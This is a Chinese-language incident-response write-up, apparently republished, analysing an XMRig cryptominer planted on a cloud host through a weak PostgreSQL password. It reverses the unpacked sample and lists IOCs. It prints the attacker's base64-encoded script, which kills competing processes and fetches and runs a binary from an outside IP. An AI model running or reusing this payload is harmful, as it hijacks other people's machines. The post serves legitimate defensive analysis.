文章总结: 本文记录云主机因PostgreSQL弱口令被植入XMRig挖矿病毒的排查与应急过程。详细分析了利用数据库漏洞执行命令、清除竞品并下载恶意样本的攻击链,提供了样本逆向分析结果及IOC指标。建议加强口令管理,清理时需终止dockerd守护进程,确认未发生逃逸。 综合评分: 91 文章分类: 应急响应,恶意软件,实战经验,云安全,漏洞分析
应急响应 | 云主机中XMRig挖矿病毒的排查与分析
原创
俺不是鸡哥
渗透结束-非常安全
2025年12月23日 15:48 北京
前言
近期监测到云主机告警外链恶意域名,由于该域名在多个威胁情报中标记为未知,除腾讯威胁情报平台外。
因为各家威胁情报的时效不同,俺经常浪费时间在无用的排查上,所以这里俺一直感觉是时效性的问题,但是需要给领导一个结果,抱着怀疑的态度开始排查。
腾讯威胁情报:https://tix.qq.com/
这里列几个常用威胁情报平台的地址:
https://x.threatbook.com/
https://ti.360.cn/
https://www.venuseye.com.cn/
https://ti.dbappsecurity.com.cn/
https://ti.qianxin.com/
https://tix.qq.com/
https://poma.nsfocus.com/
简单排查
由于外链恶意域名是一次并不是持续请求,所以先确定下主机开放的服务,但该主机是多人共同使用,运行的服务很多,只能按个确认排查
最终确认是云主机中docker启动的psql数据库存在弱口令,导致攻击者通过psql获取创建系统函数执行命令,并从攻击者的服务器上下载挖矿脚本进行挖矿
psql执行日志记录:
base64解密:
首先自定义curl函数,然后删除/tmp目录中的docker-daemon文件,杀掉同类挖矿病毒来独占资源进行挖矿,接着从攻击者服务器中下载恶意文件并执行
内容:
ZnVuY3Rpb24gX19jdXJsKCkgewogIHJlYWQgcHJvdG8gc2VydmVyIHBhdGggPDw8IiQocHJpbnRmICclcycgIiQxIiB8IHNlZCAncyM6Ly8jICM7cyMvIyAjJykiCiAgRE9DPSIvJHBhdGgiCiAgSE9TVD0iJHtzZXJ2ZXIlJToqfSIKICBQT1JUPSIke3NlcnZlciMjKjp9IgogIFsgIiRIT1NUIiA9ICIkUE9SVCIgXSAmJiBQT1JUPTgwCiAgZXhlYyAzPD4vZGV2L3RjcC8kSE9TVC8kUE9SVAogIHByaW50ZiAiR0VUICVzIEhUVFAvMS4xXHJcbkhvc3Q6ICVzXHJcbkNvbm5lY3Rpb246IGNsb3NlXHJcblxyXG4iICIkRE9DIiAiJEhPU1QiID4mMwogIHdoaWxlIElGUz0gcmVhZCAtciBsaW5lIDwmMzsgZG8KICAgIGxpbmU9JHtsaW5lJSQnXHInfQogICAgWyAteiAiJGxpbmUiIF0gJiYgYnJlYWsKICBkb25lCiAgY2F0IDwmMwogIGV4ZWMgMz4mLQp9CnJtIC1yZiAvdG1wL2RvY2tlci1kYWVtb24KZm9yIHAgaW4gL3Byb2MvWzAtOV0qOyBkbyBwaWQ9JHtwIyMqL307IGV4ZT0kKGxzIC1sIC9wcm9jLyRwaWQvZXhlIDI+L2Rldi9udWxsKTsgY2FzZSAiJGV4ZSIgaW4gKiJkb2NrZXJkIiopIGV4aXQgOzsgZXNhYzsgZG9uZQpraWxsIC05ICQocGdyZXAga2RldnRtcGZzaSkgJChwZ3JlcCBwcHBzc3NkbSkgJChwZ3JlcCBjZjk0YzhmZDIpICQocGdyZXAga2VybmVsZHgpICQocGdyZXAgcGdfbWVtKSAkKHBncmVwIGt3b3JrZXIpICQocGdyZXAgcG9zdGdyZXMtc3lzdGVtKSAkKHBncmVwIGN1cmwpICQocGdyZXAgcG9zdGdyZXNfZG0pICQocGdyZXAgcnVtcG9zdGdyZXN3aykgJChwZ3JlcCBrdGhyZWFkZGspICQocGdyZXAgbWVtb3J5KSAkKHBncmVwIGtpbnNpbmcpICQocGdyZXAgd2dldCkgJChwZ3JlcCBwb3N0Z3Jlcy1rZXJuZWwpIDI+JjEKZm9yIHBpZCBpbiAvcHJvYy9bMC05XSo7IGRvIHBpZD0ke3BpZCMjKi99OyByZXN1bHQ9JChscyAtbCAvcHJvYy8kcGlkL2V4ZSk7IGNhc2UgJHJlc3VsdCBpbiAqIihkZWxldGVkKSIqfCoicmVkaXNlcnZlciIqfCoiZGFzaCIqfCoia2luc2luZyIqfCoia2RldnRtcGZzaSIqKSBraWxsIC05ICRwaWQgOzsgZXNhYzsgZG9uZQpfX2N1cmwgaHR0cDovLzE5NS4yNC4yMzcuNzMvYm90ID4gL3RtcC9ib3QgJiYgY2htb2QgK3ggL3RtcC9ib3QgJiYgL3RtcC9ib3Q7
当时威胁情报查询:
简单分析
文件名称:bot
打包工具:upx
哈希值:
f5a7fd53488638cd3c36f39bdb6b9b35dc6df14ad837dd30eb87b95262feb2f5
下载upx解压打包的文件
https://github.com/upx/upx/releases/tag/v5.0.2
将解压的bot程序重命名为bot_upxd
文件名称:bot_upxd
编程语言:C
哈希值:
85fb4996fd46b91bda84aae63acad45d0d5784782d09fbf5141aeb426a2ca5c6
ida启动,查看一下字符串内容,可以看到这里是门罗币(XMRig)挖矿软件的帮助说明
后续在本地虚拟机中执行bot程序,可以看到会修改名称为dockerd并且同目录中会出现名为docker-daemon的程序,查看进程如下:
文件名称:docker-daemon
哈希值:
354786bac66720ed2a5e471673a381ad127bfa0503b3ec8146df2f49dd8a24ef
手动执行获取两个矿池的地址
矿池1:dockerdupdate.anondns.net:44999
矿池2:dockerdupdate.anondns.net:4433
通过kill掉docker-daemon进程后,会再次启动得知dockerd进程为docker-daemon的守护进程,在应急时可先kill掉dockerd进程
拖到ida中查看字符串
或者利用strings查看
strings docker-daemon | grep -A 30 -B 60 -i "dockerdupdate\|anondns\|44999\|4433"
其中sub_40BAA0为程序入口
跟进后
sub_454560方法用于命令参数检查
sub_4545F0方法用于跟进输入的不同参数,来执行特定的功能
跟进sub_4545F0方法后得知sub_A5CBC0方法用于格式化输出
-V时会输出版本信息
-h时输出帮助信息
–export-topology时则会获取硬件信息到topology.xml文件中,其中sub_854800方法用于获取信息
sub_854800方法:
执行docker-daemon程序来验证下是否符合
-h用于查看帮助菜单,简单解析下这些参数的作用:
-o为挖矿服务器的URL
-a为挖矿算法和币种
-u为挖矿服务器的账号
-p为挖矿服务器的密码
-x为通过代理
-k为发送存活测试
等等
-V用于查看版本
–export-topology用于导出硬件拓扑结构
攻击者未逃逸到宿主机,于是后续清理完下班打游戏
IOC
195.24.237.73
dockerdupdate.anondns.net
194.41.112.90
354786bac66720ed2a5e471673a381ad127bfa0503b3ec8146df2f49dd8a24ef
85fb4996fd46b91bda84aae63acad45d0d5784782d09fbf5141aeb426a2ca5c6
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:渗透结束-非常安全 俺不是鸡哥《应急响应 | 云主机中XMRig挖矿病毒的排查与分析》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论